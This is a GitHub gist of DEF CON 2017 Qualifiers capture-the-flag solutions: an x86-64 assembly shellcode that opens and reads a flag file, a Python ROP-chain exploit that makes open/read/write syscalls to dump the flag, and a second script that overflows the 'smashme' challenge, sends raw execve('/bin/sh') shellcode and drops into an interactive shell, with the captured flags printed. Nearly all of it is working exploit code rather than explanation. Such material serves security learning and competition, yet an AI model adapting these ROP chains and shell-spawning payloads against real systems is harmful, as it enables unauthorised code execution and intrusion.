Skip to content

Instantly share code, notes, and snippets.

@ytn86 ytn86/mute.S
Last active May 1, 2017

Embed
What would you like to do?
DEFCON 2017 Quals
BITS 64
_start:
mov rdi, rax
mov rax, 0x3
syscall
pop rcx
mov rcx, 0x67616c66
push rcx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov rax, 0x2
syscall
readflag:
mov rdi, rax
mov rsi, rbp
sub rsi, 0x80
mov rdx, 0x80
xor rax, rax
syscall
checkflag:
mov al, [rsi+0x32]
cmp al, 0x64
jge checkflag
#! python3
import sys
bss1 = 0x80ecfc4
bss = 0x80ecfc4+140
ptr = 0x80ed02c
buf = 0x802d02c
int80 = 0x0806fae0
pop_eax = 0x080e558a
push_eax = 0x080e789c
pop_ebx = 0x080481c9
pop_ecx = 0x080e5ee1
push_ecx = 0x080e403a
pop_edx = 0x0806f2fa
push_edx = 0x08064828
push_esp = 0x080e192d
xchg_eax_edx = 0x080e8e02
xor_eax_eax = 0x080555c0
inc_eax = 0x080e30a3
inc_ebx = 0x080e9b21
inc_ecx = 0x080e794e
inc_edx = 0x0805da67
#binsh = b'/bin/sh'
flag = b'flag'
gablen = 100
def exploit():
# open('flag', 0, 0);
payload = b''
payload += pI(pop_ebx)
payload += pI(0x080ed0d6)
payload += pI(pop_ecx)
payload += pI(0xffffffff)
payload += pI(inc_ecx)
payload += pI(xor_eax_eax)
payload += pI(xor_eax_eax)
payload += pI(xchg_eax_edx)
payload += pI(xor_eax_eax)
payload += pI(inc_eax)*(0x5)
payload += pI(int80)
#payload += pI(bss)
# read(3, bss1, 0x0e0e0e0e);
payload += pI(pop_ebx)
payload += pI(0xffffffff)
payload += pI(inc_ebx)*4
payload += pI(pop_ecx)
payload += pI(bss1)
payload += pI(pop_edx)
payload += pI(0x0e0e0e0e)
payload += pI(xor_eax_eax)
payload += pI(inc_eax)*(0x3)
payload += pI(int80)
# write(1, bss1, 0x0e0e0e0e);
payload += pI(pop_ebx)
payload += pI(0xffffffff)
payload += pI(inc_ebx)*2
payload += pI(pop_ecx)
payload += pI(bss1)
payload += pI(xor_eax_eax)
payload += pI(inc_eax)*(0x4)
payload += pI(int80)
payload1 = b''
payload1 += pI(0x31457185)
payload1 += b'b'*100
payload1 += payload
payload1 += b'./'*50
payload1 += flag
payload1 += b'\n'
payload1 += b'15\n'
payload1 += b'y\n'
payload1 += b'20\n'
payload1 += b'y\n'
payload1 += b'20\n'
payload1 += b'y\n'
payload1 += b'23\n'
payload1 += b'n\n'
sys.stdout.buffer.write(payload1)
def main():
exploit()
if __name__ == '__main__':
main()
"""
The flag is: Thanks to Kenshoto for the inspiration! 5fbb34920c457b2e0855a174b8de3ebc
"""
#! python3
from ctflib import Pwn
from ctflib.util import *
import sys
import time
def exploit(cn):
paylen = 33
pop_rdi_ret = 0x4014d6
pop_rsi_ret = 0x4015f7
pop_rdx_ret = 0x441e46
main_gets = 0x4009dd
bss = 0x6ca000
syscall_ret = 0x466815
sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
payload = b''
payload += b'Smash me outside, how bout dAAAAAAAAAAA'
payload += b'b'*(33)
payload += pQ(pop_rsi_ret)
payload += pQ(bss)
payload += pQ(pop_rdi_ret)
payload += pQ(0)
payload += pQ(pop_rdx_ret)
payload += pQ(0x30)
payload += pQ(syscall_ret)
payload += pQ(bss)
payload += b'\n'
#input('aaa')
cn.send(payload)
time.sleep(1)
cn.send(sc)
cn.interact()
def main():
cn = Pwn()
#cn.connect('localhost', 57348)
cn.connect('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348)
exploit(cn)
if __name__ == '__main__':
main()
"""
The flag is: You must be at least this tall to play DEF CON CTF
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.